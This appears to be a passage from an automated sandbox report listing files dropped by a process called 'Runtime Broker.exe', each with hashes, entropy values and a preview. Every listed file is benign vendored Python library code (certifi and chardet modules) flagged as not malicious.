SHA-512:	62A89A534E80ED64A1E5EA83E245A2E35BE4D1A4EF312602A8A3A9B514F3C6731747352EC70E7F4B14FB7CF63D399BAD76EC8510F12E62B1DCF5EB70BFFDD639
Malicious:	false
Preview:	# -- coding: utf-8 --..""".certifi.py.~~~~~~~~~~..This module returns the installation location of cacert.pem or its contents..""".import os..try:. from importlib.resources import path as get_path, read_text.. _CACERT_CTX = None. _CACERT_PATH = None.. def where():. # This is slightly terrible, but we want to delay extracting the file. # in cases where we're inside of a zipimport situation until someone. # actually calls where(), but we don't want to re-extract the file. # on every call of where(), so we'll do it once then store it in a. # global variable.. global _CACERT_CTX. global _CACERT_PATH. if _CACERT_PATH is None:. # This is slightly janky, the importlib.resources API wants you to. # manage the cleanup of this file, so it doesn't actually return a. # path, it returns a context manager that will give you the path. # when you enter it and will do any cleanup when you l

C:\Program Files (x86)\WinSoft Update Service\Lib\site-packages\pip\_vendor\chardet\__init__.py Download File
Process:	C:\Users\user\Desktop\Runtime Broker.exe
File Type:	Python script, ASCII text executable
Category:	dropped
Size (bytes):	1559
Entropy (8bit):	4.846229614161999
Encrypted:	false
SSDEEP:	24:z807yRiyUVOkH/HqTbVB+HlPTSfvk7YSgQWNLACrCjVbd3RYVYJspx:g0uwyUjHSRvBSMLACrCB5Ry6sD
MD5:	66D403014476318BB79B3C4A49898CDC
SHA1:	554BB2883B2AEF7451D569B80BFC5597FCE0735A
SHA-256:	62C3F9C1096C1C9D9AB85D516497F2A624AB080EFF6D08919B7112FCD23BEBE6
SHA-512:	D66ED242B559C7936E09799B184181A64E3666C870BB7C59854575DC7DF4A4394ED86022ADB276BD307019E0F7104BD9CBB8ED5D77B2080C7698ABEA823B5F54
Malicious:	false
Preview:	######################## BEGIN LICENSE BLOCK ########################.# This library is free software; you can redistribute it and/or.# modify it under the terms of the GNU Lesser General Public.# License as published by the Free Software Foundation; either.# version 2.1 of the License, or (at your option) any later version..#.# This library is distributed in the hope that it will be useful,.# but WITHOUT ANY WARRANTY; without even the implied warranty of.# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU.# Lesser General Public License for more details..#.# You should have received a copy of the GNU Lesser General Public.# License along with this library; if not, write to the Free Software.# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA.# 02110-1301 USA.######################### END LICENSE BLOCK #########################...from .compat import PY2, PY3.from .universaldetector import UniversalDetector.from .version import __version__, VERSION...def detect(

C:\Program Files (x86)\WinSoft Update Service\Lib\site-packages\pip\_vendor\chardet\big5freq.py Download File
Process:	C:\Users\user\Desktop\Runtime Broker.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	31254
Entropy (8bit):	3.8805955906579896
Encrypted:	false
SSDEEP:	768:8u4PjuVhktU0mk0X5oUdVmPLg6BSjvzwjgebYX7VqM1H+n5:8AzktUc0X59dVE+jvw8cM14
MD5:	14C69F7CCF62A473CAF8D24A85302168
SHA1:	4028BD63B9EB6C3225FC61B7E8733528EE80FD87
SHA-256:	0FFCCAE46CB3A15B117ACD0790B2738A5B45417D1B2822CEAC57BDFF10EF3BFF
SHA-512:	7584191B735F623535D25AFD962A80069C6083AD408E8DB6381E238B993209F530D1792B866643DEE2CCDE9191B3B44EDBDA347940E6432A4B29FD0E38C9034F
Malicious:	false
Preview:	######################## BEGIN LICENSE BLOCK ########################.# The Original Code is Mozilla Communicator client code..#.# The Initial Developer of the Original Code is.# Netscape Communications Corporation..# Portions created by the Initial Developer are Copyright (C) 1998.# the Initial Developer. All Rights Reserved..#.# Contributor(s):.# Mark Pilgrim - port to Python.#.# This library is free software; you can redistribute it and/or.# modify it under the terms of the GNU Lesser General Public.# License as published by the Free Software Foundation; either.# version 2.1 of the License, or (at your option) any later version..#.# This library is distributed in the hope that it will be useful,.# but WITHOUT ANY WARRANTY; without even the implied warranty of.# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU.# Lesser General Public License for more details..#.# You should have received a copy of the GNU Lesser General Public.# License along with this library; if

C:\Program Files (x86)\WinSoft Update Service\Lib\site-packages\pip\_vendor\chardet\big5prober.py Download File
Process:	C:\Users\user\Desktop\Runtime Broker.exe
File Type:	Python script, ASCII text executable
Category:	dropped
Size (bytes):	1757
Entropy (8bit):	4.96764341536432
Encrypted:	false
SSDEEP:	24:vZixsiaiq5E807yRiyUVOkH/HqTbVB+HWRTB2i2A2Rs7ay/D:vsx/1ef0uwyUjHSvT2i2tD2D
MD5:	1A45BD1F7CE22E30EEC32D870AB02E44
SHA1:	5297DF2758B6BE575459E08565B07382EB6D52ED
SHA-256:	901C476DD7AD0693DEEF1AE56FE7BDF748A8B7AE20FDE1922DDDF6941EFF8773
SHA-512:	202F2F681B84A872FE767DC7B42E2B3162E4019BFA97F5C5471CAEB5C222BE7282F692E2A56532D90A94A3355F96275362B291AEBEBA102B8377FE9886021AEA
Malicious:	false
Preview:	######################## BEGIN LICENSE BLOCK ########################.# The Original Code is Mozilla Communicator client code..#.# The Initial Developer of the Original Code is.# Netscape Communications Corporation..# Portions created by the Initial Developer are Copyright (C) 1998.# the Initial Developer. All Rights Reserved..#.# Contributor(s):.# Mark Pilgrim - port to Python.#.# This library is free software; you can redistribute it and/or.# modify it under the terms of the GNU Lesser General Public.# License as published by the Free Software Foundation; either.# version 2.1 of the License, or (at your option) any later version..#.# This library is distributed in the hope that it will be useful,.# but WITHOUT ANY WARRANTY; without even the implied warranty of.# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU.# Lesser General Public License for more details..#.# You should have received a copy of the GNU Lesser General Public.# License along with this library; if

C:\Program Files (x86)\WinSoft Update Service\Lib\site-packages\pip\_vendor\chardet\chardistribution.py Download File
Process:	C:\Users\user\Desktop\Runtime Broker.exe
File Type:	Python script, ASCII text executable
Category:	dropped
Size (bytes):	9411
Entropy (8bit):	4.862229966867439
Encrypted:	false
SSDEEP:	192:kt17u43bbWNinqFlBv9Ekv9fRFUv9rYfj9ivt9uczv9Yh:8u4HWNEqlBFEkFfRFUFMfRivj5zFYh
MD5:	1348267FC095CAE77B3F24A48DD6ED06
SHA1:	DB44178E9A4908F7256C85A75A7374FB57BF868F
SHA-256:	DF0A164BAD8AAC6A282B2AB3E334129E315B2696BA57B834D9D68089B4F0725F
SHA-512:	F11D2C26226D95142251F3C5C3AA2B2D7C3F40E7C7C191ABCAF14325E76F5C3EA47A1532AF970A214C45864908D936337524EB41C90880464868A54F230C5A65
Malicious:	false
Preview:	######################## BEGIN LICENSE BLOCK ########################.# The Original Code is Mozilla Communicator client code..#.# The Initial Developer of the Original Code is.# Netscape Communications Corporation..# Portions created by the Initial Developer are Copyright (C) 1998.# the Initial Developer. All Rights Reserved..#.# Contributor(s):.# Mark Pilgrim - port to Python.#.# This library is free software; you can redistribute it and/or.# modify it under the terms of the GNU Lesser General Public.# License as published by the Free Software Foundation; either.# version 2.1 of the License, or (at your option) any later version..#.# This library is distributed in the hope that it will be useful,.# but WITHOUT ANY WARRANTY; without even the implied warranty of.# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU.# Lesser General Public License for more details..#.# You should have received a copy of the GNU Lesser General Public.# License along with this library; if

C:\Program Files (x86)\WinSoft Update Service\Lib\site-packages\pip\_vendor\chardet\charsetgroupprober.py Download File
Process:	C:\Users\user\Desktop\Runtime Broker.exe
File Type:	Python script, ASCII text executable
Category:	dropped
Size (bytes):	3787
Entropy (8bit):	4.453194796047569
Encrypted:	false
SSDEEP:	96:vst17u40JbBxS8EBpSL7CXa3hgX+IFWXqjuAuYKKv:kt17u48LHNfnwZ
MD5:	56D216283F72ADAB9B18F27EE3AD5732
SHA1:	8AE03D53E3875F7F73F292C120D720C6AE496214
SHA-256:	E9B0EEF1822246E49C5F871AF4881BD14EBD4C0D8F1975C37A3E82738FFD90EE
SHA-512:	9B7B4C838B276708F6EB512D6F84FB87361E14B1B1CDE349D5A9270EE3B71905B758B538F5132A7FA5D35477841DD2FFCA275CE25A1D31B1563C477291EBEB94
Malicious:	false
Preview:	######################## BEGIN LICENSE BLOCK ########################.# The Original Code is Mozilla Communicator client code..#.# The Initial Developer of the Original Code is.# Netscape Communications Corporation..# Portions created by the Initial Developer are Copyright (C) 1998.# the Initial Developer. All Rights Reserved..#.# Contributor(s):.# Mark Pilgrim - port to Python.#.# This library is free software; you can redistribute it and/or.# modify it under the terms of the GNU Lesser General Public.# License as published by the Free Software Foundation; either.# version 2.1 of the License, or (at your option) any later version..#.# This library is distributed in the hope that it will be useful,.# but WITHOUT ANY WARRANTY; without even the implied warranty of.# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU.# Lesser General Public License for more details..#.# You should have received a copy of the GNU Lesser General Public.# License along with this library; if

C:\Program Files (x86)\WinSoft Update Service\Lib\site-packages\pip\_vendor\chardet\charsetprober.py Download File
Process:	C:\Users\user\Desktop\Runtime Broker.exe
File Type:	Python script, ASCII text executable
Category:	dropped
Size (bytes):	5110
Entropy (8bit):	4.607059113006975
Encrypted:	false
SSDEEP:	96:Ptzcu40B0KIYY6PG/Gyf0LGszdQjq/qbRAdkvSQ0B8E:Ptzcu4lKHuizdQdG
MD5:	A257430E4394E805107C519BA417C3D4
SHA1:	4CAC3F02D5FDAA8776B49966206247ACD3BD151E
SHA-256:	2929B0244AE3CA9CA3D1B459982E45E5E33B73C61080B6088D95E29ED64DB2D8
SHA-512:	EEE24BB77D3F2981C15BA577FBDD2A092A3A786B8CE99B56D204214C737B8EBA2CD380E8FBC10CC9BD758C949A79626912B57482EE099EA0E43448DCE295BE37
Malicious:	false
Preview:	######################## BEGIN LICENSE BLOCK ########################.# The Original Code is Mozilla Universal charset detector code..#.# The Initial Developer of the Original Code is.# Netscape Communications Corporation..# Portions created by the Initial Developer are Copyright (C) 2001.# the Initial Developer. All Rights Reserved..#.# Contributor(s):.# Mark Pilgrim - port to Python.# Shy Shalom - original C code.#.# This library is free software; you can redistribute it and/or.# modify it under the terms of the GNU Lesser General Public.# License as published by the Free Software Foundation; either.# version 2.1 of the License, or (at your option) any later version..#.# This library is distributed in the hope that it will be useful,.# but WITHOUT ANY WARRANTY; without even the implied warranty of.# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU.# Lesser General Public License for more details..#.# You should have received a copy of the GNU Lesser General Publi

C:\Program Files (x86)\WinSoft Update Service\Lib\site-packages\pip\_vendor\chardet\cli\__init__.py Download File
Process:	C:\Users\user\Desktop\Runtime Broker.exe
File Type:	very short file (no magic)
Category:	dropped
Size (bytes):	1
Entropy (8bit):	0.0
Encrypted:	false
SSDEEP:	3:v:v
MD5:	68B329DA9893E34099C7D8AD5CB9C940
SHA1:	ADC83B19E793491B1C6EA0FD8B46CD9F32E592FC
SHA-256:	01BA4719C80B6FE911B091A7C05124B64EEECE964E09C058EF8F9805DACA546B
SHA-512:	BE688838CA8686E5C90689BF2AB585CEF1137C999B48C70B92F67A5C34DC15697B5D11C982ED6D71BE1E1E7F7B4E0733884AA97C3F7A339A8ED03577CF74BE09
Malicious:	false
Preview:	.

C:\Program Files (x86)\WinSoft Update Service\Lib\site-packages\pip\_vendor\chardet\cli\chardetect.py Download File
Process:	C:\Users\user\Desktop\Runtime Broker.exe
File Type:	Python script, ASCII text executable
Category:	dropped
Size (bytes):	2774
Entropy (8bit):	4.450094140583418
Encrypted:	false
SSDEEP:	48:Fo2sJX3m8g2zwYV+714VpMP7H1kybbxEJPzFN2+jRYNvGxZgOa1:Fo9m8jwLCMZPyPxNBjamqOM
MD5:	B6F6AEE6A6E66D313A254C5ED919FC37
SHA1:	1AC823BB42D75BF6F68797728501692BF918C1C1
SHA-256:	0C8F1D955DC5043D1CD1703FCB7B10EFCCFBE780D4BF527C9F7E11B438CE5CDC
SHA-512:	82586A181EE65F0726B06702E1FB7D864A0D2D93BC7BEE0510EFC85A2333D930D79E53FCCF34DB9803F55A591DEB73CBF89D7510EE4B4062519035E32DBDC903
Malicious:	false
Preview:	#!/usr/bin/env python.""".Script which takes one or more file paths and reports on their detected.encodings..Example::.. % chardetect somefile someotherfile. somefile: windows-1252 with confidence 0.5. someotherfile: ascii with confidence 1.0..If no paths are provided, it takes its input from stdin..."""..from __future__ import absolute_import, print_function, unicode_literals..import argparse.import sys..from pip._vendor.chardet import __version__.from pip._vendor.chardet.compat import PY2.from pip._vendor.chardet.universaldetector import UniversalDetector...def description_of(lines, name='stdin'):. """. Return a string describing the probable encoding of a file or. list of strings... :param lines: The lines to get the encoding of.. :type lines: Iterable of bytes. :param name: Name of file or collection of lines. :type name: str. """. u = UniversalDetector(). for line in lines:. line = bytearray(line). u.feed(line). # shortcu

C:\Program Files (x86)\WinSoft Update Service\Lib\site-packages\pip\_vendor\chardet\codingstatemachine.py Download File
Process:	C:\Users\user\Desktop\Runtime Broker.exe
File Type:	Python script, ASCII text executable
Category:	dropped
Size (bytes):	3590
Entropy (8bit):	4.62398833547819
Encrypted:	false
SSDEEP:	96:Kt17u4ZvK9RfAbiAgdoWnS38L8oxInSOrM+l84bMSmg0:Kt17u4dK9Re2y+wodj+0
MD5:	33C5E712BAD7523F996BFA09D85EB5BF
SHA1:	3E2B59C552B7E985F2EFEE068ABA34A0C7938409
SHA-256:	558A7FE9CCB2922E6C1E05C34999D75B8AB5A1E94773772EF40C904D7EEEBA0F
SHA-512:	CC5CAD5F2E7BAE182FAA81CEEB8FB780883B528E4858A9708A07DFB1C2D7C09819C2699013FAD7FFC5AF09903DA3C86EE1C31CEBC61E555C45C1E0D517ACF399
Malicious:	false
Preview:	######################## BEGIN LICENSE BLOCK ########################.# The Original Code is mozilla.org code..#.# The Initial Developer of the Original Code is.# Netscape Communications Corporation..# Portions created by the Initial Developer are Copyright (C) 1998.# the Initial Developer. All Rights Reserved..#.# Contributor(s):.# Mark Pilgrim - port to Python.#.# This library is free software; you can redistribute it and/or.# modify it under the terms of the GNU Lesser General Public.# License as published by the Free Software Foundation; either.# version 2.1 of the License, or (at your option) any later version..#.# This library is distributed in the hope that it will be useful,.# but WITHOUT ANY WARRANTY; without even the implied warranty of.# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU.# Lesser General Public License for more details..#.# You should have received a copy of the GNU Lesser General Public.# License along with this library; if not, write to th

C:\Program Files (x86)\WinSoft Update Service\Lib\site-packages\pip\_vendor\chardet\compat.py Download File
Process:	C:\Users\user\Desktop\Runtime Broker.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	1134
Entropy (8bit):	4.878947669861055
Encrypted:	false
SSDEEP:	12:cj9EIXN8lASza7yPEkp4dcGTyUwUhOkHZHAglrxqTbVPAx2Cx59hPHDocyF0GHLf:GXN807yRiyUVOkH/HqTbVB+HzC0gAuWU
MD5:	438E10616469DA04E9BD42F257A00ADF
SHA1:	FA159FDDDFC0F2FF1438778EF6712D89144C382F
SHA-256:	3CA4F31E449BB5B1C3A92F4FCAE8CC6D7EF8AB56BC98CA5E4130D5B10859311C
SHA-512:	7B792C3F8572750AED744EC715F15771F29703F19B189DC6D6CA0CF05488A6236C22ACAA8C473B8BA3BA4EDA527F167DBA26F07DA0D87B74834856456758600A
Malicious:	false
Preview:	######################## BEGIN LICENSE BLOCK ########################.# Contributor(s):.# Dan Blanchard.# Ian Cordasco.#.# This library is free software; you can redistribute it and/or.# modify it under the terms of the GNU Lesser General Public.# License as published by the Free Software Foundation; either.# version 2.1 of the License, or (at your option) any later version..#.# This library is distributed in the hope that it will be useful,.# but WITHOUT ANY WARRANTY; without even the implied warranty of.# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU.# Lesser General Public License for more details..#.# You should have received a copy of the GNU Lesser General Public.# License along with this library; if not, write to the Free Software.# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA.# 02110-1301 USA.######################### END LICENSE BLOCK #########################..import sys...if sys.version_info < (3, 0):. PY2 = True. PY3 = False. b

C:\Program Files (x86)\WinSoft Update Service\Lib\site-packages\pip\_vendor\chardet\cp949prober.py Download File
Process:	C:\Users\user\Desktop\Runtime Broker.exe
File Type:	Python script, ASCII text executable
Category:	dropped
Size (bytes):	1855
Entropy (8bit):	4.9674061820096185
Encrypted:	false
SSDEEP:	24:Pixsiaiq5E807yRiyUVOkH/HqTbVB+HDsZRuHwAysvOawK:Kx/1ef0uwyUjHSEWIHwRowK
MD5:	EAC9F36E937956F46F3E4C37F9CD7D76
SHA1:	5E1E40B592AB5BADAEBEE6D1CB845F34475BBEED
SHA-256:	4D9E37E105FCCF306C9D4BCBFFCC26E004154D9D9992A10440BFE5370F5FF68C
SHA-512:	429A0E8A95E7B0A00DC5CF08F6A19D9CAAA94B9D27443110EEFCCF5E7E6891983409D447187209D630FB21AD52D719AE0DD2F95F0274D7D0207C9F608D2EE08B
Malicious:	false
Preview:	######################## BEGIN LICENSE BLOCK ########################.# The Original Code is mozilla.org code..#.# The Initial Developer of the Original Code is.# Netscape Communications Corporation..# Portions created by the Initial Developer are Copyright (C) 1998.# the Initial Developer. All Rights Reserved..#.# Contributor(s):.# Mark Pilgrim - port to Python.#.# This library is free software; you can redistribute it and/or.# modify it under the terms of the GNU Lesser General Public.# License as published by the Free Software Foundation; either.# version 2.1 of the License, or (at your option) any later version..#.# This library is distributed in the hope that it will be useful,.# but WITHOUT ANY WARRANTY; without even the implied warranty of.# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU.# Lesser General Public License for more details..#.# You should have received a copy of the GNU Lesser General Public.# License along with this library; if not, write to th

C:\Program Files (x86)\WinSoft Update Service\Lib\site-packages\pip\_vendor\chardet\enums.py Download File
Process:	C:\Users\user\Desktop\Runtime Broker.exe
File Type:	Python script, ASCII text executable
Category:	dropped
Size (bytes):	1661
Entropy (8bit):	4.918641425002419
Encrypted:	false
SSDEEP:	24:uKNXveYMIUPhNkBFbFWd/YMSj6YML1ShnccagRxdI5rLGkC6P:F9ve9j1d/sWChnpayXkZ
MD5:	754EAD831ACB9BA0C2E768243ADA5DA2
SHA1:	2EAF9CADC33CD208A4A0378158A07FEA397F6A91
SHA-256:	0229B075BF5AB357492996853541F63A158854155DE9990927F58AE6C358F1C5
SHA-512:	529BE8C6A49A533549DB8B41D1118F5D77780F167259095F92D8F11C5AF09039C7BB110BB56A0C6F5151174418293BA8C2D7AC2BB666B7F723160E9F066D5AA1
Malicious:	false
Preview:	""".All of the Enums that are used throughout the chardet package...:author: Dan Blanchard (dan.blanchard@gmail.com)."""...class InputState(object):. """. This enum represents the different states a universal detector can be in.. """. PURE_ASCII = 0. ESC_ASCII = 1. HIGH_BYTE = 2...class LanguageFilter(object):. """. This enum represents the different language filters we can apply to a. ``UniversalDetector``.. """. CHINESE_SIMPLIFIED = 0x01. CHINESE_TRADITIONAL = 0x02. JAPANESE = 0x04. KOREAN = 0x08. NON_CJK = 0x10. ALL = 0x1F. CHINESE = CHINESE_SIMPLIFIED \| CHINESE_TRADITIONAL. CJK = CHINESE \| JAPANESE \| KOREAN...class ProbingState(object):. """. This enum represents the different states a prober can be in.. """. DETECTING = 0. FOUND_IT = 1. NOT_ME = 2...class MachineState(object):. """. This enum represents the different states a state machine can be in.. """. START = 0. ERROR = 1. ITS_ME = 2...c

C:\Program Files (x86)\WinSoft Update Service\Lib\site-packages\pip\_vendor\chardet\escprober.py Download File
Process:	C:\Users\user\Desktop\Runtime Broker.exe
File Type:	Python script, ASCII text executable
Category:	dropped
Size (bytes):	3950
Entropy (8bit):	4.7144135499229085
Encrypted:	false
SSDEEP:	96:Kt17u4Abi3JGELunBiIn349ZX6HL6awXaUAsk2n:Kt17u4Abi51LuIIn34P6eaaV
MD5:	A43AE497CCD0D98F53E4F2E7EF5250E2
SHA1:	3F5C243F912E8E14DF288F356403A5D920159B3E
SHA-256:	924CAA560D58C370C8380309D9B765C9081415086E1C05BC7541AC913A0D5927
SHA-512:	54A4091F88901E96742A935EB6D8A18A6463B00234AD3B5A10A41376EB3AD9750E489BC782EC741BD0FAB242B3C3D84A549CA1DEEB8547AE0999A21E219C6F78
Malicious:	false
Preview:	######################## BEGIN LICENSE BLOCK ########################.# The Original Code is mozilla.org code..#.# The Initial Developer of the Original Code is.# Netscape Communications Corporation..# Portions created by the Initial Developer are Copyright (C) 1998.# the Initial Developer. All Rights Reserved..#.# Contributor(s):.# Mark Pilgrim - port to Python.#.# This library is free software; you can redistribute it and/or.# modify it under the terms of the GNU Lesser General Public.# License as published by the Free Software Foundation; either.# version 2.1 of the License, or (at your option) any later version..#.# This library is distributed in the hope that it will be useful,.# but WITHOUT ANY WARRANTY; without even the implied warranty of.# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU.# Lesser General Public License for more details..#.# You should have received a copy of the GNU Lesser General Public.# License along with this library; if not, write to th

C:\Program Files (x86)\WinSoft Update Service\Lib\site-packages\pip\_vendor\chardet\escsm.py Download File
Process:	C:\Users\user\Desktop\Runtime Broker.exe
File Type:	Python script, ASCII text executable
Category:	dropped
Size (bytes):	10510
Entropy (8bit):	4.816326627010161
Encrypted:	false
SSDEEP:	192:Kt17u42Uiw4c0gE4999/M///eeeVe//97PPnxJRae99999M0f/9999g//////N/J:6u4v0FArwa1l
MD5:	9C3BAAFEFA516EA1EEFCB03593C8CB1D
SHA1:	B6AE3D309926B691E6E8BE5DF7E9EC7E22DDAF62
SHA-256:	46E5E580DBD32036AB9DDBE594D0A4E56641229742C50D2471DF4402EC5487CE
SHA-512:	FFA57445FC50ABE5B6ECDF8B5EFDD96A97D1C068E8140D36A2755D9095AEB11FD826848E4B54F6183E0B5775AE4B7A2074D997185A23B34CAEA5F4BF1C80A035
Malicious:	false
Preview:	######################## BEGIN LICENSE BLOCK ########################.# The Original Code is mozilla.org code..#.# The Initial Developer of the Original Code is.# Netscape Communications Corporation..# Portions created by the Initial Developer are Copyright (C) 1998.# the Initial Developer. All Rights Reserved..#.# Contributor(s):.# Mark Pilgrim - port to Python.#.# This library is free software; you can redistribute it and/or.# modify it under the terms of the GNU Lesser General Public.# License as published by the Free Software Foundation; either.# version 2.1 of the License, or (at your option) any later version..#.# This library is distributed in the hope that it will be useful,.# but WITHOUT ANY WARRANTY; without even the implied warranty of.# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU.# Lesser General Public License for more details..#.# You should have received a copy of the GNU Lesser General Public.# License along with this library; if not, write to th

C:\Program Files (x86)\WinSoft Update Service\Lib\site-packages\pip\_vendor\chardet\eucjpprober.py Download File
Process:	C:\Users\user\Desktop\Runtime Broker.exe
File Type:	Python script, ASCII text executable
Category:	dropped
Size (bytes):	3749
Entropy (8bit):	4.731931768516198
Encrypted:	false
SSDEEP:	96:Kt17u493gzxj6HtQyylEl+s/rRWTIIRpB:Kt17u493y56ie4z
MD5:	7FCBC25522B5FB00AD88D12E86022F16
SHA1:	F583D01EA725D06785A47BE5AA47A9586CB4E843
SHA-256:	883F09769D084918E08E254DEDFD1EF3119E409E46336A1E675740F276D2794C
SHA-512:	6C84F3B62F696C19CEC04CF795D7379D423B5B37FCCD3F94D5670AEE6361B424BF3B943B77E08C5DEF0296B4E1437501648F495437B2D38182DB9CA4AE1CD437
Malicious:	false
Preview:	######################## BEGIN LICENSE BLOCK ########################.# The Original Code is mozilla.org code..#.# The Initial Developer of the Original Code is.# Netscape Communications Corporation..# Portions created by the Initial Developer are Copyright (C) 1998.# the Initial Developer. All Rights Reserved..#.# Contributor(s):.# Mark Pilgrim - port to Python.#.# This library is free software; you can redistribute it and/or.# modify it under the terms of the GNU Lesser General Public.# License as published by the Free Software Foundation; either.# version 2.1 of the License, or (at your option) any later version..#.# This library is distributed in the hope that it will be useful,.# but WITHOUT ANY WARRANTY; without even the implied warranty of.# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU.# Lesser General Public License for more details..#.# You should have received a copy of the GNU Lesser General Public.# License along with this library; if not, write to th

C:\Program Files (x86)\WinSoft Update Service\Lib\site-packages\pip\_vendor\chardet\euckrfreq.py Download File
Process:	C:\Users\user\Desktop\Runtime Broker.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	13546
Entropy (8bit):	4.072619899441131
Encrypted:	false
SSDEEP:	192:kt17u4FdvXtmWt5mYt8EkFiTPJ1CTgEdCJz0ZUnYP+smG1tBLC/lGMwxpppHg:8u4vfQgJ8EkYTPJ+dtZggIG5L8G5RpHg
MD5:	FC74D266C33CB05F1ECD53EC517EC462
SHA1:	F92F0B57596EC180FB1505D3B3B966F07D61DFAA
SHA-256:	FBB19D9AF8167B3E3E78EE12B97A5AEED0620E2E6F45743C5AF74503355A49FA
SHA-512:	4D3AA23B3F95EFE49A8F2201FFEA90154264BF545F70B96B8AB2F2481D74514244C82B076EB4C616962243EE40D2EBAD2BB66154FBDABCE0E739DBD3883A16AD
Malicious:	false
Preview:	######################## BEGIN LICENSE BLOCK ########################.# The Original Code is Mozilla Communicator client code..#.# The Initial Developer of the Original Code is.# Netscape Communications Corporation..# Portions created by the Initial Developer are Copyright (C) 1998.# the Initial Developer. All Rights Reserved..#.# Contributor(s):.# Mark Pilgrim - port to Python.#.# This library is free software; you can redistribute it and/or.# modify it under the terms of the GNU Lesser General Public.# License as published by the Free Software Foundation; either.# version 2.1 of the License, or (at your option) any later version..#.# This library is distributed in the hope that it will be useful,.# but WITHOUT ANY WARRANTY; without even the implied warranty of.# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU.# Lesser General Public License for more details..#.# You should have received a copy of the GNU Lesser General Public.# License along with this library; if

C:\Program Files (x86)\WinSoft Update Service\Lib\site-packages\pip\_vendor\chardet\euckrprober.py Download File
Process:	C:\Users\user\Desktop\Runtime Broker.exe
File Type:	Python script, ASCII text executable
Category:	dropped
Size (bytes):	1748
Entropy (8bit):	4.9856800780876736
Encrypted:	false
SSDEEP:	24:Pixsiaiq5E807yRiyUVOkH/HqTbVB+HWRTmjrsBATsDaMK:Kx/1ef0uwyUjHSvojrsBc7MK
MD5:	35C9C358A1F2554B15382675B680CB38
SHA1:	17A570BA185BF5BAC0B670932D3EA74376E19F7B
SHA-256:	32A14C4D05F15B81DBCC8A59F652831C1DC637C48FE328877A74E67FC83F3F16
SHA-512:	341BA6EC350ED7212AA2E77DADE00297100CFFB9650871025E4B798B1522055CCD41BA1919AA577B6716AB4A4B8AFED806BCCE0E35D9B97FB2413385750CE853
Malicious:	false
Preview:	######################## BEGIN LICENSE BLOCK ########################.# The Original Code is mozilla.org code..#.# The Initial Developer of the Original Code is.# Netscape Communications Corporation..# Portions created by the Initial Developer are Copyright (C) 1998.# the Initial Developer. All Rights Reserved..#.# Contributor(s):.# Mark Pilgrim - port to Python.#.# This library is free software; you can redistribute it and/or.# modify it under the terms of the GNU Lesser General Public.# License as published by the Free Software Foundation; either.# version 2.1 of the License, or (at your option) any later version..#.# This library is distributed in the hope that it will be useful,.# but WITHOUT ANY WARRANTY; without even the implied warranty of.# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU.# Lesser General Public License for more details..#.# You should have received a copy of the GNU Lesser General Public.# License along with this library; if not, write to th

C:\Program Files (x86)\WinSoft Update Service\Lib\site-packages\pip\_vendor\chardet\euctwfreq.py Download File
Process:	C:\Users\user\Desktop\Runtime Broker.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	31621
Entropy (8bit):	3.8933123222030295
Encrypted:	false
SSDEEP:	768:8u4fWnmUAziXRa7ZLTQAg0ljyeZCN04skmj22bgBXrgb/QWA4Pcvx:8dAbheZIANZyV04s7XbgBXrgRPcJ
MD5:	F22F9B84302F594271169463DF2C2ADC
SHA1:	1FE6190636462E94488B056A56770C84D48F3370
SHA-256:	368D56C9DB853A00795484D403B3CBC82E6825137347231B07168A235975E8C0
SHA-512:	A1C424421B90AE8D889C20DF9C2B7402502C81BBFB2EBCA6482FE076FA6E9C99C4062618A1BB866AB58652EB13CEB3A16B21673B85E252A9B8B34E1766E0128A
Malicious:	false
Preview:	######################## BEGIN LICENSE BLOCK ########################.# The Original Code is Mozilla Communicator client code..#.# The Initial Developer of the Original Code is.# Netscape Communications Corporation..# Portions created by the Initial Developer are Copyright (C) 1998.# the Initial Developer. All Rights Reserved..#.# Contributor(s):.# Mark Pilgrim - port to Python.#.# This library is free software; you can redistribute it and/or.# modify it under the terms of the GNU Lesser General Public.# License as published by the Free Software Foundation; either.# version 2.1 of the License, or (at your option) any later version..#.# This library is distributed in the hope that it will be useful,.# but WITHOUT ANY WARRANTY; without even the implied warranty of.# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU.# Lesser General Public License for more details..#.# You should have received a copy of the GNU Lesser General Public.# License along with this library; if

C:\Program Files (x86)\WinSoft Update Service\Lib\site-packages\pip\_vendor\chardet\euctwprober.py Download File
Process:	C:\Users\user\Desktop\Runtime Broker.exe
File Type:	Python script, ASCII text executable
Category:	dropped
Size (bytes):	1747
Entropy (8bit):	4.986618421486693
Encrypted:	false
SSDEEP:	24:Pixsiaiq5E807yRiyUVOkH/HqTbVB+HWRT8j8Afs/ba8Xy:Kx/1ef0uwyUjHSv640H8Xy
MD5:	BA6A1374A470177EC21C4E1528E23F5B
SHA1:	F6ECD5D34962A5B81B71BDC40B140D553A0C120E
SHA-256:	D77A7A10FE3245AC6A9CFE221EDC47389E91DB3C47AB5FE6F214D18F3559F797
SHA-512:	444E6AD68079ECC0AA10330638B1B8FA632BD111CB63DEF3BDA2673A69C0F1E77374342F7D7581EFF98221E320A36D1A65DE265F03E3FF009FE0DD4045C941CC
Malicious:	false
